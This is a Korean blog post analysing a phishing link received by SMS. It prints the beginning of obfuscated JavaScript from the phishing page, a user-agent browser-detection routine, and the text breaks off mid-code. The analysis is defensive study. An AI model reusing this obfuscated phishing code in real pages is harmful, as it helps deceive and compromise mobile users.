악성(피싱) 앱 분석기
- 분석은 예전에 했는데 시간이 바쁘다는 핑계로 글은 이제서야 쓰게 되었습니다. T.T - 악성코드를 주로 다루지 않다보니 잘못된 부분이 있을 수 있습니다. 해당 부분에 대해 알려주시면 감사하겠습니다. # 발단 최근 들어 피싱 문자가 많이 늘어난게 보인다. 지인에게 short url 서비스로 보내진 주소를 공유받아 접속해보았다. 처음 부터 흥미를 자극하는 난독화된 JS 코드가 보인다. ... 코드 마지막 부분에 보면 함수 호출`()`로 끝난다. 실제 로직이 포함된 코드를 실행하기 위해 마지막에 함수 호출을 할테니 해당 부분을 빼고 콘솔에서 실행해보았다. ```javascript (function anonymous( ) { var rNsMwWzBiNaSuYcTeJbHfLvZlTaRjBaMoZkUfOsFqMcGkCtRjUsKuSwHrYwVgXaSkUhKjPnFkPvDoMlQkTwJbAyDuZvV = { yCdZwGrUaDePkOsWuVyCuEpSdNfQsWaEjFeCgRaLkIt: function () { var u = navigator.userAgent, app = navigator.appVersion; return { uQnJaNmSpFjMeVbT: u.indexOf('Trident') > -1, lWtPeOsDbQnQbFiLdFpNfPaLxAzFeKvZyQzRcMlWnEpS: u.indexOf('Presto') > -1, gPxUjAsWuQnQuEaLkHyPoFjNuXpOyBhWjTdVfQbDoNyUfPgRjUwHzJiXaFeDnFwVfDpAzTyD: u.indexOf('AppleWebKit') > -1, nQzDtOzQiMiLpLpMdSwOyPhFxIeJnYiEwGrCfLjNfVgKuFiLrJuLvFqIsCuLkCfWlDcLrXvBuMsYjB: u.indexOf('Gecko') > -1 &&